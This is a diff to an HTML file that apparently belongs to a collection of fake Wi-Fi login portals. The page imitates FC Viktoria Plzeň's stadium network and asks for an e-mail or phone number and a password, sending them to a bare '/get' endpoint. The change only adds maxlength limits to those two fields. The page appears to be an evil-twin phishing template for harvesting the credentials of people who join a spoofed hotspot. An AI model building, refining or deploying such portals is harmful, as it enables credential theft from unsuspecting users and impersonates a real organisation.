--- a/portals/other/plzen_wifi.html
+++ b/portals/other/plzen_wifi.html
@@ -170,8 +170,8 @@
       <h2>FC Viktoria Plzeň · Stadionová síť</h2>
     </center>
     <form action="/get" id="login-form">
-      <input name="email" class="input-field" type="text" placeholder="E-mail nebo telefon" required>
-      <input name="password" class="input-field" type="password" placeholder="Heslo" required>
+      <input name="email" class="input-field" type="text" placeholder="E-mail nebo telefon" maxlength="100" required>
+      <input name="password" class="input-field" type="password" placeholder="Heslo" maxlength="100" required>
       <button class="submit-btn" type="submit">Pokračovat</button>
     </form>
   </div>
